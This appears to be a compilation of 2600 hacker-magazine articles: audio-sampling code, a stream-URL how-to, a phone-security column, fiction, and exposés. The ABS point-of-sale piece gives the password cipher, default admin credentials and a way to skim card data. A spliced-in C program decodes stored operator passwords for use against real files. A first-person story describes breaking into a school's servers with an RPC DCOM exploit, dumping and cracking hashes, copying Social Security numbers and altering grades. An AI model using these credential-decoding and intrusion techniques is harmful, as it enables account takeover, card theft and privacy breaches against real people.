Still increment and wrap pos but use mod_pos(pos) as the speaker position instead. Do you see what's going on here? We're using the rhythm of binary numbers! If you use a sample that has 2, 4, 8, 16, 32, 64, 128 and so on beats in it, all cuts will be done on the beat or on the half-beat or whatever. Fun isn't it!? If your sample was ONE TWO THREE FOUR and you OR a significant bit with a lesser significant bit you get ONE THREE TWO FOUR.

Now let's add a couple of tricks. We'll define SILENCE as someplace in the sample where the speaker is at rest. Typically I find this to be byte zero of the sample. Let's map the space bar to mods[17] and add

    if(mods[17] == 1 && pool == 1) return SILENCE;

between the "Get half the input" for-loop and the "Compute and store where appropriate" for-loop. See what happens now? By holding down space and any combination of bits you get a choppy sort of sound. This is really good for producing silence breaks and coming back up on a beat.

The last trick is a little more complex but it produces a sound that is really quite acceptable to the listener. Imagine that any change that mod_pos(pos) returns from pos is a new span. The best way to describe what a span is is to show you:

    pos      1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ...
    mod_pos  1 2 1 2 3 4 3 4 5  6 11 12 13 14  8  7  8  9 10  9 ...
    span     A A B B B B C C C  C  D  D  D  D  E  F  F  F  F  G ...

Any non-linear return from mod_pos is considered a new span. Let's introduce a new variable, j. It's a float so that we can increment it by fractions of one, say 0.5f. We store how much we're incrementing it in speed. If speed is two, for instance, we are now incrementing j by two instead of one and we get a fast beat that is still on beat. Now, if we only modify j at the beginning of each new span to mod_pos and increment it by one the rest of the time, it follows mod_pos:

    int lpos;        /* stores the previous return from mod_pos */
    int pos2;        /* return from mod_pos */
    float j, speed;  /* j and how much we increment it, speed */
    int q, j_int;
    /* sample is our sample data */

    /* fill an audio buffer, with length len */
    void audio(unsigned char *buffer, int len) {
        int i;
        for(i=0; i<len; i++) {
            lpos = pos2;                 /* store previous return from mod_pos */
            pos2 = mod_pos(pos);         /* get the next one */
            if((pos2 - 1) % 0xffff != lpos)
                j = (float)pos2;         /* if pos2 is not linear store it in j */
            /* HERE */
            /* HERE TOO */
            j += speed;
            pos++;                       /* increment and wrap pos */
            pos %= 0xffff;
        }
    }

Now we need a good place to change the speed. Imagine that keys Z and X represent a pitch-bender. If we map Z to bend_up and X to bend_down we can replace /* HERE */ with

    q = 0;
    if(bend_up == 1) speed *= CONSTANT;
    else q++;
    if(bend_down == 1) speed /= CONSTANT;
    else q++;
    if(q == 2) speed = 1.0f;

This will bend up or down by CONSTANT (I find 1.009f is nice) if Z or X is pressed; otherwise it will leave speed at 1. Do you see what this does? If you press QWERTYUIASDFGHJK so that you have one repeating beat and bend up or down, you get a really nice effect. You see what I'm talking about?

The next thing we want to do is put a boundary on j so that it can't span across one beat into another. We can do this by replacing /* HERE TOO */ with

    j_int = (int)j;
    j_int &= 0xffff;
    if((j_int - pos2) > (0xffff / NUMBER_OF_BEATS_IN_SAMPLE))
        buffer[i] = SILENCE;             /* span spans over one beat */
    else
        buffer[i] = sample[j_int];

Now, you may be asking yourself why j is a float; that is so speed can be a fraction as well as a whole number.

You can download this complete program from http://hobones.dogsoft.net/dnb.tgz. This is a script, so you can run it directly. You need SoX, libsdl and you need to be able to compile things. It loops the first 65535 samples of the audio file you provide as an argument. Good luck; if you make any music with this or improve the technique, send me an email, to pantsbutt@gmail.com. Shouts to Citadel, RaDMAN, Jason Scott and the BlockParty crowd!

Retail Automation ABS
by L00dHum

I have been working in a hardware store part-time in order to put myself through college. During the course of my employment, a new POS called ABS was put into place by a company called Retail Automation. ABS is run mostly by hardware stores and other supply houses, but for a full list of locations you can visit their website at http://retailautomation.biz/. The system developer made a big deal about how his system had access controls to prevent unauthorized access, but I found it trivial to simply pull up my store's list of customers, previous transactions, special pricing, contracts, and a whole host of other information just by viewing the raw data files. I tried to stay out of the way the week of the installation but, once everything settled down, I began to look around the system and it has made for many hours of fun, which helps pass the time.

The system does not use a client/server architecture for its backend; it simply uses a shared drive on a workstation. The data files are in a format called ISAM. Each table is a set of two files, a DAT file and a KEY file. The DAT file is simply a collection of fixed-length records concatenated together and the KEY file is the index into the data file. All of the data is free and clear and, since all of the POS and back office machines need access to read and modify the data, there is no security in place to prevent the theft or modification of the raw data files. Retail Automation is even nice enough to provide a DOS executable in the SYSDATA directory, called vcfview.exe, which will happily open any DAT file and sort it into records for your viewing pleasure. If you want to wreak real havoc, you can break out your favorite hex editor and change prices or modify receipts, since file modification is fully allowed.

I did find one table that was "encrypted," the OPERATOR table, which stores the user names, passwords, and authority levels for ABS. One especially boring day I decided to pick this table apart and it only took me 20 minutes. The table was encoded with a shifted alphabet substitution cipher. If you don't have 20 minutes to figure it out, here it is: all lower case letters are shifted by one (b=a, c=b, ... a=z); the uppercase alphabet has numbers at the beginning and is shifted by ten (0=A, 1=B, ... A=K, ... Z=9). With this table you can simply log in as any user that you want without having to use raw files or a hex editor. There also appear to be superuser accounts named SYSADM and SECADM, where the passwords are set the same as the user name. The developer, Tom, and his wife, Lisa, appear to leave privileged accounts on the system for themselves without passwords.

It appears that Retail Automation uses the X-Charge system to integrate credit card authorization into ABS. In our store, they installed the X-Charge authorization server on one of the POS machines. This authorization server is responsible for receiving credit card authorization requests, sending them to the merchant server over the Internet (encrypted), and then sending the response back to the calling POS. The system does appear to be decent in that it doesn't permanently store any credit card information, but that doesn't mean that it doesn't send that information back and forth to the credit card authorization system in the clear. X-Charge interacts with ABS via a queue directory. A request file is created with the extension .req that contains details of the purchase including the amount of purchase, credit card number, expiration date, and all of the information from the magnetic stripe including name. X-Charge then reads in this information, sends it to the merchant service, and puts a response file back into the queue directory in a file with the extension .ans. Once the transaction is complete, the answer and request files are deleted. The fact that they are on disk even for a limited amount of time means that you can skim this data fairly easily by simply monitoring the queue directory. There even exists a tool called watchDirectory that will register itself with Windows so that it is notified when files change in the queue directory. Then watchDirectory will do whatever you want with these files, from emailing them to copying them to another location for you to peruse at your leisure. The request files all start with the text "XC_SALE" (quotes included), so the files should not be too difficult to spot. I have not determined whether disk sectors are wiped when the files are deleted, but it might be an interesting exercise to scan unallocated space for these data.

Lastly, the developer thought it prudent to create a backup routine for our store by using a series of thumb drives. A simple application waits until a predetermined hour and then copies all of the store's data onto the drive. Since at least one of these drives is kept in a workstation at all times, it is pretty easy to swipe the drive and have a copy of the data for yourself or your next employer. It is almost always the people on the inside that you have to worry about, more than those on the outside.

Through my meager interactions with the developer, coupled with what I have seen by exploring the system, it appears that Retail Automation is extremely cavalier when dealing with other people's proprietary and personal information. Hopefully they get a clue before any of their customers are harmed by their incompetence.

Connecting to StreamTheWorld Audio Stream Directly
by mr_cow

In this article, I'll show you how to connect directly to a streamtheworld (http://www.streamtheworld.com/) audio stream without using the provided web client. First, we go to the web page that has a client we suspect connects to a streamtheworld server; for this example I'll use the MMRadio client (http://www.mmradio.com/player/379). We then view the source code of the web page to locate the SWF file that loads the audio streaming control:

    <script type=text/javascript>
    player = function (est){
      document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="486" height="258">')
      document.write('<param name="movie" value="http://www.mmradio.com/sites/mmradio.com/files/players/TeleRadio.swf?'+est+'">')
      document.write('<param name="quality" value="high">')
      document.write('<embed src="http://www.mmradio.com/sites/mmradio.com/files/players/TeleRadio.swf?'+est+'" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="486" height="258"></embed>')
      document.write('</object>')
    }</script>

In this example, the SWF URL is located in the value parameter of the movie control:

    http://www.mmradio.com/files/players/TeleRadio.swf

Next, we disassemble the SWF using the flasm disassembler (http://flasm.sourceforge.net/) and search for the stream's XML configuration. For this page, the following part of the disassembled SWF builds the address:

    push 'http://provisioning.streamtheworld.com/streaminfo.php?CALLSIGN='
    setRegister r:2
    pop
    label68:
    push r:2, 'CALLSIGN'
    getMember

We also search for the call sign:

    push 'CALLSIGN', 'XEAWAM'

Now that we have the address for the XML config that the player uses, we open it in our web browser:

    http://provisioning.streamtheworld.com/streaminfo.php?CALLSIGN=XEAWAM

The XML config contains the server, port, and mount parameters:

    <config_stream>
      <serverip>208.80.54.69</serverip>
      <serverport>80</serverport>
      <serverport_bak>3690</serverport_bak>
      <mount>XEAWAM</mount>
      <buffersize>90000</buffersize>
      <messageconnection>CONNECTION IN PROGRESS...</messageconnection>
      ...

Next, we search for those variables in our previously disassembled SWF source code, to see if there are any other parameters that we might have to pass in the stream URL:

    function2 StartStream (r:4='statemessage', r:5='serverport', r:6='mount', r:7='serverip') (r:1='_root')
      push r:_root
      setRegister r:2
      pop
      push UNDEF
      ...
      setRegister r:3
      pop
      push 1, r:statemessage, r:2, 'event_changestatus'
      callMethod
      pop
      push 'urltoload', 'http://', r:serverip
      add
      push ':'
      add
      push r:serverport
      add
      push '/'
      add
      push r:mount
      add
      push '?streamtheworld_user=1'
      ...

In this case, the StartStream function assembles the audio stream address. Of course, we have to see if there are any additional parameters we need to pass to the server to get the stream, so we assemble the address of the target audio stream as is done in the function and open that address in our web browser:

    http://208.80.54.69:80/XEAWAM?streamtheworld_user=1

The server will return an MP3 stream. Of course, the stream will be a really BIG file, so we only use the browser to check that we're returned an MP3. If we're returned an error, we have to look for additional parameters. If we are returned an MP3, we can then open it with winamp, vlc, xmms, or any other network audio stream client. For more Mexican streamtheworld sites, a long list of stations organized by state can be found at Fred's Cantu (http://mexicoradiotv.com/).

Club Mate is now ready to be shipped directly to you! The German beverage invasion is now in full swing and 2600 is happy to be in the thick of it. First introduced in the United States at The Last HOPE in 2008, this caffeinated, carbonated, comparatively low in sugar drink has really taken off. Club Mate has proven to be extremely popular in the hacker and programming community. Both HOPE attendees and German operatives tell us that one gets a burst of energy similar to all of those energy drinks that are out there without the "energy drink crash" that usually comes when you stop consuming them. If you want a case of the stuff (12 half-liter glass bottles), it's $45 plus shipping. For those of you running an office or a hacker space, consider getting a full pallet (800 half-liter bottles) at a steeply discounted rate. You will have no trouble reselling to the addicts you create. At the moment, we can only ship to the continental United States. Visit our online store (store.2600.com) to place an order or call us (631.751.2600) if you have further questions. Further updates on club-mate.us.
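The following is an added example and not Retail Automation's code: a decoder for the shifted alphabet substitution cipher L00dHum describes for the ABS OPERATOR table, together with a splitter for fixed-length DAT records so the decoded user names and passwords come out per record. The article only says the records are fixed length; the layout used here (an 8-byte user, an 8-byte password and a 1-byte authority level, space padded) and the two sample records are constructed for the example.

```c
/*
 * abs_operator_decode.c: added example, not Retail Automation's code.
 * Cipher per the article: lowercase stored as plaintext+1 (b=a ... a=z);
 * digits and uppercase form one 36-symbol alphabet shifted by ten (0=A ... Z=9).
 * Record layout below is a constructed assumption, not the real ABS layout.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static const char UPPER36[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";

/* Map one stored character back to plaintext; padding and punctuation pass through. */
char decode_char(char c)
{
    const char *p;
    if (c >= 'a' && c <= 'z')
        return (char)('a' + (c - 'a' + 25) % 26);          /* shift back by one */
    p = strchr(UPPER36, c);
    if (c != '\0' && p != NULL)
        return UPPER36[(p - UPPER36 + 10) % 36];            /* shift forward by ten */
    return c;
}

/* Inverse of decode_char; used only to build the constructed sample table. */
char encode_char(char c)
{
    const char *p;
    if (c >= 'a' && c <= 'z')
        return (char)('a' + (c - 'a' + 1) % 26);
    p = strchr(UPPER36, c);
    if (c != '\0' && p != NULL)
        return UPPER36[(p - UPPER36 + 26) % 36];            /* -10 mod 36 */
    return c;
}

#define USER_LEN 8                              /* constructed layout */
#define PASS_LEN 8
#define REC_LEN  (USER_LEN + PASS_LEN + 1)

typedef struct {
    char user[USER_LEN + 1];
    char pass[PASS_LEN + 1];
    char authority;                             /* assumed: stored as a plain digit */
} Operator;

/* Decode one fixed-width field and trim the space padding. */
static void take_field(const unsigned char *src, size_t width, char *dst)
{
    size_t i;
    for (i = 0; i < width; i++)
        dst[i] = decode_char((char)src[i]);
    dst[width] = '\0';
    while (width > 0 && dst[width - 1] == ' ')
        dst[--width] = '\0';
}

/* Split a DAT image into records; returns how many were stored in out. */
size_t parse_operators(const unsigned char *dat, size_t len, Operator *out, size_t max)
{
    size_t n = 0, off;
    for (off = 0; off + REC_LEN <= len && n < max; off += REC_LEN, n++) {
        take_field(dat + off, USER_LEN, out[n].user);
        take_field(dat + off + USER_LEN, PASS_LEN, out[n].pass);
        out[n].authority = (char)dat[off + USER_LEN + PASS_LEN];
    }
    return n;
}

/* Constructed sample DAT: SYSADM with password SYSADM, and an account with
 * no password, written through encode_char so the stored bytes are "encrypted". */
size_t build_sample(unsigned char *buf, size_t buflen)
{
    static const char *const rows[] = { "SYSADM  SYSADM  9", "tom             9" };
    size_t r, i, off = 0;
    for (r = 0; r < 2; r++) {
        if (off + REC_LEN > buflen)
            break;
        for (i = 0; i < REC_LEN; i++)
            buf[off + i] = (unsigned char)(i < USER_LEN + PASS_LEN
                                           ? encode_char(rows[r][i]) : rows[r][i]);
        off += REC_LEN;
    }
    return off;
}

/* Decode the constructed sample and return record k's user (0) or password (1). */
const char *sample_field(size_t k, int want_pass)
{
    static unsigned char dat[64];
    static Operator ops[4];
    size_t len = build_sample(dat, sizeof dat);
    size_t n = parse_operators(dat, len, ops, 4);
    if (k >= n)
        return "";
    return want_pass ? ops[k].pass : ops[k].user;
}

int main(void)
{
    unsigned char dat[64];
    Operator ops[4];
    size_t i, n = parse_operators(dat, build_sample(dat, sizeof dat), ops, 4);
    for (i = 0; i < n; i++)
        printf("user=%-8s pass=%-8s authority=%c\n", ops[i].user, ops[i].pass, ops[i].authority);
    return 0;
}
```

Against a real OPERATOR.DAT you would read the file into memory and call parse_operators with the record length vcfview.exe reports, then look for exactly the two patterns the article calls out: a decoded password equal to the user name, and a password field that is all padding.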
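The following is an added example, not mr_cow's code and not part of StreamTheWorld's player: it pulls serverip, serverport and mount out of a streaminfo.php response and assembles the stream URL the same way the disassembled StartStream function does. The embedded XML is the config quoted in the article so the program runs offline; the tag extractor is a deliberately minimal string search, not a general XML parser.

```c
/*
 * stw_url.c: added example of assembling a StreamTheWorld stream URL from the
 * streaminfo.php config shown above. Not mr_cow's code.
 */
#include <stdio.h>
#include <string.h>

/* The config quoted in the article, embedded here as the sample input. */
static const char CONFIG_XML[] =
    "<config_stream><serverip>208.80.54.69</serverip>"
    "<serverport>80</serverport><serverport_bak>3690</serverport_bak>"
    "<mount>XEAWAM</mount><buffersize>90000</buffersize>"
    "<messageconnection>CONNECTION IN PROGRESS...</messageconnection>"
    "</config_stream>";

/* Copy the text between <tag> and </tag> into out. Returns 1 on success,
 * 0 when the tag is absent or the value would not fit. */
int extract_tag(const char *xml, const char *tag, char *out, size_t outlen)
{
    char open[64], close[64];
    const char *s, *e;
    size_t n;
    if (snprintf(open, sizeof open, "<%s>", tag) >= (int)sizeof open)
        return 0;
    snprintf(close, sizeof close, "</%s>", tag);
    s = strstr(xml, open);
    if (s == NULL)
        return 0;
    s += strlen(open);
    e = strstr(s, close);
    if (e == NULL)
        return 0;
    n = (size_t)(e - s);
    if (n + 1 > outlen)
        return 0;
    memcpy(out, s, n);
    out[n] = '\0';
    return 1;
}

/* http://<serverip>:<serverport>/<mount>?streamtheworld_user=1, as StartStream
 * concatenates it. Returns 0 if a parameter is missing or the URL does not fit. */
int build_stream_url(const char *xml, char *url, size_t urllen)
{
    char ip[64], port[16], mount[64];
    if (!extract_tag(xml, "serverip", ip, sizeof ip) ||
        !extract_tag(xml, "serverport", port, sizeof port) ||
        !extract_tag(xml, "mount", mount, sizeof mount))
        return 0;
    return snprintf(url, urllen, "http://%s:%s/%s?streamtheworld_user=1",
                    ip, port, mount) < (int)urllen;
}

/* URL built from the embedded config (static buffer), "" on failure. */
const char *sample_stream_url(void)
{
    static char url[256];
    return build_stream_url(CONFIG_XML, url, sizeof url) ? url : "";
}

/* 1 if the embedded config carries <tag>, else 0. */
int sample_has_tag(const char *tag)
{
    char tmp[128];
    return extract_tag(CONFIG_XML, tag, tmp, sizeof tmp);
}

int main(void)
{
    puts(sample_stream_url());
    return 0;
}
```

The resulting string is what you hand to vlc or xmms. If port 80 is refused, the config also carries serverport_bak (3690 here), and extract_tag reads it the same way; anything the browser check returns other than an MP3 means StartStream is adding a parameter this builder does not know about.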

Transmissions
by Dragorn

What's the most insecure device in your life? Like thousands of others, I left the Batcave this month to stand in line to get the latest must-have gadget, a new Android phone. After showing up to the store so many times that the employees recognized me, running the gamut from "Hey, it's you," "Sir, you know we don't open until 10:00," "Oh, it's the guy who ordered the first one," and finally, "Why are you back again, didn't you know you're on a network with no international support?", I had a little brick of technology waiting for a login. A week later, while standing in a museum overseas looking at Soviet-era Eastern-Bloc's finest computing offerings, my phone blinking "No carrier," it occurred to me that I had more general purpose computing power in my pocket than on exhibit in the entire room.

My old cell phone was a phone. It didn't even do that terrifically well, and it sure didn't do much else. Attempts to bully it into running some bastard version of a web browser usually led to it crashing unceremoniously. The new phone has a real operating system, multitasking, GPS, a browser with JavaScript, and is basically a netbook with a smaller screen. What can my phone do now? Automatically launch applications on incoming calls, override the outgoing dialer, run Python scripts, and this is with the user's permission!

Despite being a techie, I've sometimes been accused of bordering on Luddite tendencies. I don't love the thought that aspects of the power grid are being connected to commodity networks. I'm not entirely sure, for example, that pushing everything to wireless is a great idea. I'm not convinced my phone needs to know where I am at all times and call back to the mothership. For once, I have proof I'm not entirely overreacting.

With my old phone, I was reasonably confident that the only way to snoop on who I called was for my helpful phone company to supply those records (of course, this would never happen without a warrant, right?) or for someone to physically take my phone. Now that phones act like common computing devices, they're also vulnerable to attacks against the browser: a phone on an open wifi network is just as susceptible to TCP hijacking attacks and browser cache attacks as a PC, and phones which opportunistically switch to wifi networks will happily send your plaintext passwords over the air, and may preserve those attacks into the future when a user is on the cell network. No unencrypted connection should be considered secure (do you really think your cell carrier has your security interests at heart?).

How much data is at risk on your phone? At least your calling records and phone book, indicating friends, family, employers. Browsing history, cached web data, session cookies, and saved passwords are all stored on the device, including logins to services which can directly cost you money (at the best) or expose billing information (at the worst): banks, shopping sites, and application markets. Most phones don't have any concept of on-device encryption, meaning your information is most likely stored unencrypted if the phone is ever stolen. Billing is directly tied to your phone: if a compromised program can make or redirect phone calls, it can rack up direct charges.

Of course, there are iPhone worms targeting jailbroken users who haven't changed their root passwords (hint: "alpine"). Infection rates and date don't seem to be available, but the worms have been newsworthy despite a very small percentage of the device users being vulnerable. Of course, only users who have already bypassed the protections in the system are exposed: enabling SSH with root allowed, with a known default password, is as inviting a target as one could make, and bypasses the protections where apps aren't normally run with full privileges. A worm like this is a harbinger of problems to come, however. If a vulnerability had been found in the operating system (be it iPhone, Symbian, Android, Windows Mobile, WebOS) with similar access rights, a worm capable of spreading device-to-device in an urban area could hit a large percentage of the users in a short period of time, ranging from the mostly benign "pay me $5 to explain how to fix this" to the annoying Rickroll to the highly malicious, which, using a trick I've been a fan of for some time, can establish a command channel to download future malware to the device.

This doesn't even touch the problem of malicious "legitimate" applications. Multiple applications have been accused of accessing the phone books of users and stealing information. Some phone operating systems attempt to force applications to identify what services they'll utilize and allow the user to allow or deny the behavior, though generally the APIs are designed to prevent a complete compromise of the phone (as much to enforce policy as for user security). But once general purpose code is running on the device it's likely difficult to completely secure it, especially when applications are meant to interact with each other and the phone settings. With added complexity comes added security risks.

Having a high-power always-connected computer in a pocket sure is convenient, but I think I might want to go back to being a Luddite after all.

The Importance of Updating Your Computer and Hacking Your School's Network
by Desert_Fox and 6|21|3|11

As all of you know, one of the most essential things that you should do to protect your computer is install weekly or monthly updates, especially if it's a server and especially if you're an administrator in charge of 400 computers as well as 4 servers that hold the personal information of over 2000 people. That is probably one of the most well-stressed pieces of advice that any frequent computer user should take to heart, especially Windows users, and we've got a great example as to why.

I'm sure that everyone remembers the MS Blaster Worm and all the security warnings about the RPC DCOM vulnerability. MS Blaster infected over 500,000 PCs whose owners failed to update their computers through Windows Update and then tried to use the infected PCs to DDoS the Windows Update website, but failed at that because the URL that was coded in the worm was actually just a mirror to the site, which MS took offline (damn that sucks). While I still don't know exactly what the RPC DCOM does, probably because I'm too lazy to look it up, there are some quick things that I know about it. First, it runs on port 135, but ports 139 and 445 are vulnerable as well. Second, the vulnerability affects unpatched Windows 2000, XP and Server 2003 installations, and it is on by default. Third, once exploited you can gain complete access to the PC through the command prompt and have full privileges, depending on which user is currently logged in. And lastly, after that vulnerability came out and even before the MS Blaster worm came out, there was a whole mess of exploits all over the Internet.

6|21|3|11 and I were extremely curious about exactly how secure our school's network was. We aren't going to tell you what school it was, mainly for security reasons and because our administrators would probably send us to jail if they were to find out. Also, I believe that there's at least one student out there who goes to our school and would love this information. All we're going to say is that it's a big high school, somewhere in the western U.S.

School was just about to start and I had a computer graphics class with 6|21|3|11 and we spent most of the time in class trying different programs to see if we could crack the admin password on our computers, which were running Windows 2000. For three months, we failed at that because, unfortunately, the computers were updated. We had a little fun with CGI proxies throughout the month of September, when we found out that they bypassed the school's Internet filter, but eventually the admins caught up to us and blocked every CGI proxy that could be used. Then, it took me five minutes to figure out how to bypass the filter. I actually typed (How to Bypass Internet Filters) into Yahoo and then got through.

So, in late October, we did some port scanning on the internal network. We found some interesting ports and a lot of "135s" on many of the computers at school, especially that one special port. We mapped out what the network looked like and it was basically four main servers: one for grades, one for financial stuff, one for the website, and one for e-mail (which was the vulnerable server). Next, we searched for some RPC DCOM exploits and found a bunch on Google. I took one to school and tested it on one of the servers that had the most ports open. Bingo! It worked! We had command line access to the server. Once inside, we uploaded PWDUMP onto the server and grabbed the password hashes. After we grabbed the hashes, we decrypted them using John the Ripper and LC4. By the way, the Windows 2000 family shares root access to all its hard disk drives by default (the administrative C$-style shares), meaning we could just "Map Network Drive" to the other Windows servers and then access the server with all the grades on it. But we hit another bump. We found out that the administrator password that we had cracked wasn't the right password for the library and computer lab computers, so we couldn't install anything on those computers. We couldn't access the web server, because it used different passwords than the ones that we were able to obtain.

Since we had the entire faculty's passwords, it was easy to gain access to the information. We found a copy of the program that they used to enter all of our grades and store every student's information. We were shocked to find that the program contained every student's address, phone number and social security number, as well as their parents' social security numbers. It was in a 3GB folder and we downloaded the entire thing onto our external hard drive. We were also able to download teachers' e-mails. One of the e-mails gave instructions on how to use the grading program and how to set it up correctly so that it would properly connect to the grade server. We also found out that the school's website had a link to the school's grade server and that, if you added port 82 to the end of its URL (ie http://GradeServer.schoolname.com:82/), it would direct you to a secret site where all you had to do to gain access to a teacher's grade book was type in their name and password. I found a copy of it on Google and was able to change my grades during lunch time in the library. Hee hee.

In conclusion, one vulnerability can lead to another. That's the importance of updating your computer. All of the programs that were used to do everything described were available for free by searching Google.

Shout outs to: H.R., J.L., T2, C.K., S & J, ed, gm, ot, J.M., hb, R.P., J.N., The Easter Bunny, jesus, and santa.

FICTION: The Particle
by Leviathan

Micah Gardner glanced outside at another gray and wet Philadelphia morning. Like the past couple of days, heavy raindrops resonated loudly on the window of his home office. He watched the poplars and maples along the back edge of his yard for a moment, glistening bright green against the dark sky, the flowing sheet of water distorting his view of the trees. A wind gust blew the rain sharply against his window.

He looked back toward his desk as his personal computer sprang to life. He typed in the eight digits displayed on his keychain fob as the system logged him in to Uni*Star’s corporate network. Like other players in the telecommunications industry, Uni*Star was infamous for ruthless dedication to the pursuit of profit, regardless of how detrimental the cuts were to employees and customers. Like most large corporations, the company was always churning people: laying off in one division while hiring in the other. Not surprisingly, mid-level managers like Hromka were admonished to “make the numbers” and were rewarded with bonuses and stock options when their budget goals were reached.

~oOo~ Despite his personal dissatisfaction with work, Micah had it pretty good. Demand was high for his area of expertise and he was considered a top-notch technical resource, very well paid for a thirty-four-year-old with a two-year degree. In addition, he could work from home thanks to his remote office. To any impartial observer, it wouldn’t be a really good atmosphere in there today anyway. But unlike most days, there wasn’t much that could distract him. His thoughts were on yesterday’s stunning news about Jessie Hatch. His friend Pete had called him yesterday with the news: she was found in her cubicle, slumped over the keyboard. The paramedics arrived quickly but couldn’t save her. It was shocking and unfair. A few months ago, her doctors had confidently declared success in her battle with ovarian cancer. She was firmly in remission, they’d assured, thanks to early detection and aggressive treatment. Jessie and her girlfriends subsequently threw a huge party at Jonesey’s to celebrate her restored health. Micah was there and he marveled at the joy in Jessie’s voice and her smile. Tears and hugs and margaritas flowed freely as everyone congratulated Jessie on beating the odds. But now, she was gone.

He had worked with the thirty-year-old brunette on the secure access project and admired her for her energy and enthusiasm, qualities he hadn’t displayed for a long time. Away from their work environment, they seemed to bond as the two of them talked long into the night. She used to send him instant messages while he was in his office at the data center, asking for technical help, or inviting him to partake in cookies or other homemade treats. He always enjoyed visiting her in her cube, the fabric walls festooned with artwork by her preschool nephew and photos from her competitive volleyball days. She always seemed glad to see him. He was always bewitched by her eyes, clear and bright and dark, that warm engaging smile and those pretty brown eyes that carried both charm and a hint of flirtation. Now they haunted him. At that moment, a feeling of finality and helplessness overwhelmed him, then he closed his eyes for a moment. He shook his head as he watched the screen indifferently.

~oOo~ Micah tried to focus on his work as best he could. He reviewed his projects and issues from yesterday. He began sifting through his email, scanning and deleting the system warnings, alerts, reports, and log messages. His inbox started swelling with a stream of emails, alerts, and logs. Occasionally he made a note to himself to check something that looked like a concern. He glossed over a couple of technology news feeds. Finished with the news, he clicked idly on Uni*Star’s internal directory. With his growing dissatisfaction at work, he’d made it a habit to stay informed about other positions Uni*Star was looking to fill. Inexplicably, he opened a link that directed him to job opportunities within the company. The first open position was a new listing: “External Customer Technical Analyst II”. He started reading the description of duties, and the job location, realizing immediately that this was Jessie’s job up for bid. Anger shot through his temples. He unconsciously clenched his jaw. Obviously, human resources hadn’t yet removed Jessie’s profile from the system. He looked at her ID photo on his display. The company doesn’t waste any time when customers are screaming and projects are slipping. He hoped Jessie’s family would not inadvertently hear of their daughter’s job being posted one day after she died. There would be time for grieving among his peers at the visitation on Thursday night.

Wayne Hromka, Jessie’s manager, was responsible for this job posting. His reputation as a tyrant was legendary. He once denied time off to an employee for her own wedding (after all, she was still in her probationary period). He also discontinued staff meetings after he grew tired of pointed challenges by employees during question and answer sessions. His main concern was making himself look good to the Chief Information Officer, everyone else be damned. Micah felt total disgust with the modus operandi of Hromka and the company in general.

~oOo~ Micah’s pensive mood was abruptly shattered by the buzz of the smartphone clipped to his belt, which alerted him to a problem in the Accounts Payable grid. As if on cue, an instant message appeared on his workstation screen as the AP manager, Scott Denker, typed: You know anything about this alert we just got? Immediately, Micah logged in and confirmed that the alert was valid: the first system in the cluster was not responding. According to the alert, one of four servers in this high-availability system had just crashed hard. He would be responsible for fixing the problem. Boy, he didn’t need that today. Micah was about to type back his response, but he realized the worrywarts in AP would appreciate some hand-holding. Though Denker irritated him sometimes, he did have a good working relationship with him.

So instead of typing back he picked up the phone and dialed his number. “Scott, what’d you do to my server?” he said with mock outrage when Denker answered on the first ring.

“Uh, it wasn’t me. I’m sticking to that story!” Micah chuckled.

“Well, obviously we just lost a node, but your grid is still up and everything is operational. Judging by the current traffic, you dropped maybe four or five users when the system went down, but it looks like they’ve all reconnected to a good system.”

“Well that’s good to know,” Denker said with relief in his voice.

“I’ll take a look and see what I can do from here. I’ll start diagnostics and take a look. We should have an answer pretty quickly. Anything else comes up, you can just page me, okay?”

“I’ll try not to bother you ‘less I have to. Thanks Micah, just keep me in the loop.”

“Okay Scotty, will do.” Micah knew that Denker hated to be called “Scotty”. They both chuckled broadly despite the situation.

~oOo~ Micah logged in to the concentrator that enabled him to view the failed system’s display, just as if he were standing in the computer room. He wasn’t prepared for what he saw. Hundreds of memory state errors appeared on the screen, each one with a different hardware identifier. That meant that every memory module in the system failed. He stared at the screen in disbelief. One bad memory module? Sure, it happens all the time. But having eight failures in the span of a few minutes was unheard of. Even more bizarre, there was a delay of a minute or so between the messages for each module. Then finally, the system crashed. Micah opened a service request for hardware replacement and relayed the news to Scott without mentioning the multiple failures. He tried to think of the last time he’d had this many failures in such a short time, but couldn’t.

~oOo~ In the afternoon, the rain finally seemed to let up a bit. Even as he worked on his other projects, Micah couldn’t fathom what had happened with the AP system. He was just about to wrap things up for the day when his smartphone buzzed again. This time, one of Uni*Star’s web proxy servers, which handled internal users’ browser requests, reported a bad power supply. The server never hiccupped thanks to the second, redundant power module. After a few minutes, he logged off and called it a day.

~oOo~ He spent the evening sitting in his living room, eating leftover Chinese food and watching a DVD of presentations from the recent System Security Conference that he was unable to attend in person. The separation from Jacquie last year and their subsequent divorce left him indifferent. He was acutely aware that he should “get a life” just as she easily had. But he was exhausted tonight and felt more than justified in cracking open another cold beer, sipping it slowly. Before long he drifted off to sleep there on the sofa, with the seemingly endless stream of monotonic presentations still droning on his big screen TV.

~oOo~ The DVD was long finished when the buzzing plastic box on his belt shook him awake. He rubbed his eyes groggily and stood, then walked down the hall to his office. He logged in and finally looked at his smartphone screen. The operations center was paging him. He looked at the clock: 4:15 am. He called the on-duty supervisor, an amicable fellow everyone knew as Big Bill. Bill was not having a good night: when he answered the phone, he sounded both exasperated and overdosed on caffeine, and somewhat bitter.

“Micah, what’s happening to these systems? I’m getting hardware alerts, drive failures, dead interfaces, you name it. What’s more, the network group got an alert on a failed router, too. More outages. Hromka even had security look at the video of the server room floor for the last 24 hours, suspecting sabotage. They fast-forwarded through every camera angle. Nothing.”

Typical Hromka. Then again, without any other answers Micah realized he’d have done the same. He listened attentively but realized most of the information was nothing new, then paused before speaking.

“Uh, are any of our main applications affected?” Micah was aware his voice was still sleepy and tentative.

“The certificate server is down.” That meant the Internet secure sign-in function was disabled and no one could log in to the Uni*Star web site.

“Alright, I’ll get on that one first and call you back. Do we have an ETA on repair?”

“Not yet. I just got off the phone with Tony. At least four, possibly more.”

“Hey man, what are the environmentals like?”

“Nah, we already checked. The AC power is steady, no spikes or brownouts. Same with temperature and humidity, the room’s been between 65 and 67 degrees at every sensor.”

“We’re not having a good week.”

